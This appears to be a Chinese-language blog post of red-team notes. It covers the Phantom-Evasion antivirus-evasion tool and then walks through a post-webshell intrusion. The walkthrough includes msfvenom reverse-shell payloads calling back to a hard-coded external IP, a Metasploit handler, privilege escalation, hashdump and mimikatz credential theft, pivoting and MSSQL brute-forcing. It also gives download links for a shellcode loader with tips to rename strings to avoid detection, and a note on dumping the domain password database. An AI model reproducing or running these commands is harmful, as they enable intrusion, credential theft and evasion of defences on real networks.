2018年12月3日星期一

PHANTOM EVASION 2.0

Phantom-Evasion
Phantom-Evasion is an interactive antivirus evasion tool written in python capable to generate (almost) FUD executable even with the most common 32 bit msfvenom payload (lower detection ratio with 64 bit payloads). The aim of this tool is to make antivirus evasion an easy task for pentesters through the use of modules focused on polymorphic code and antivirus sandbox detection techniques. Since version 1.0 Phantom-Evasion also include a post-exploitation section dedicated to persistence and auxiliary modules.

PHANTOM EVASION 2.0

Phantom-Evasion是一个用python编写的交互式防病毒逃避工具,即使使用最常见的32位msfvenom有效负载(64位有效负载的较低检测率),也能生成(几乎)FUD可执行文件。该工具的目的是通过使用专注于多态代码和防病毒沙箱检测技术的模块,使得防病毒逃避成为测试者的一项简单任务。从版本1.0开始,Phantom-Evasion还包括一个专门用于持久性和辅助模块的后期开发部分。

内网渗透

拿到webshell之后我们进行内网渗透,打开msf,我们先生成一个回连木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.71.218.172 LPORT=443 -f dll>/root/Desktop/443.dll

生成木马后,我们在菜刀里放入生成的木马,运行,同时打开msf准备回连

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set LHOST 192.71.218.172
set lport 443
run

提权

background 或 ctrl+z

use exploit/windows/local/ms11_080_afdjoinleaf  
set session 1
run
hashdump      //密码获取
load mimikatz //使用mimikatz
kerberos      //查看解密

新加路由查看子网

route
background 
sessions 
route add 192.168.1.0 255.255.255.0 2
search mssql   //找mssql模块
use auxiliary/scanner/mssql/mssql_login  //使用login模块

show options 

set rhosts 192.168.1.1/24 

set password sa@123
run
show options 
set BEUTEFORCE_SPEED 0
run

端口扫描search portscan 

use   auxiliary/scanner/portscan/tcp  //使用scanner模块
show options 
set RHOSTS 192.168.177.0/24
set ports 139,445,3389  //设置扫描端口

通过C#.NET编程绕过杀软

kali msfcenom 生成C#shellcode

root@kali:~#  msfvenom --arch x64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.2.145 -f csharp > payload.txt


Micropoor_shellcode for payload backdoor


Micropoor_shellcode:

Usage:

Micropoor_shellcode  port host

E.g

Micropoor_shellcode.exe 4444 192.168.1.5

Generate payload:

msfvenom  -p windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=53 -b '\x00' -f c |grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"

copy shellcode to Micropoor_box.rb








Micropoor_shellcode_x64.exe:
大小: 136192 字节
修改时间: 2019122, 4:40:59
MD5: 304F3C23AD6C57714EDB73D93DA6813D
SHA1: 63B213272AADA91A44F965741E3720EE25CAF7C9
CRC32: 4C2FDE0A
https://drive.google.com/open?id=14HapmSXQtb-HpnXeO3MUEf2utwKfkhOa

Micropoor_shellcode_x86.exe:
大小: 117248 字节
修改时间: 2019122, 2:45:50
MD5: D91444F0A632DEE7F57BAE432CEFFAEC
SHA1: 3D5135FE30FBEFD090B6BBB1F7738DB25B0C2CCC
CRC32: 02BE2833
https://drive.google.com/open?id=15GqGl5KgfVpEkCBItrmqddpDxmXzFG6m

Micropoor_shellcode.rb
大小: 956 字节
修改时间: 2019122, 3:13:17
MD5: 9A82AB2C3A39CABC26FC68864DB07BA1
SHA1: 92D6253C88BA10073CD3AAEE8C38C366DFC7761F
CRC32: 97FA3861
https://drive.google.com/open?id=17uv2Mszu4et3Co1HWQ50mMZiPCL7Ku9F

目前搜集问题总结:

问题1:程序崩溃:
           shellcode分离加载器分为x86,x64,版本。请对应相关的Micropoor_shellcode.exe。
这里需注意,msfvenom的payload其中windows/messagebox,是分x64与x86的,只是msfvenom本身仅提供了x86版本的shellcode。所以如果需运行messagebox,需要调用Micropoor_shellcode_x86.exe。
           程序崩溃2:
           如果生成x86或者x64的shellcode,那么msf本身请对应相关位数的payload。

问题2:被查杀:
           了解用法后,请去掉Micropoor的字符串字样,或者更改其他字符串即可。
         

WINDOWS SERVER 2008-2016 脱域快照

Ntds.dit是主要的AD数据库,包括有关域用户,组和组成员身份的信息。它还包括域中所有用户的密码哈希值。为了进一步保护密码哈希值,使用存储在SYSTEM注册表配置单元中的密钥对这些哈希值进行加密。第二个加密步骤是为了执行密码转储以进行审计,需要两个文件的副本。

学习资源

https://start.me/p/PwlKgn/apt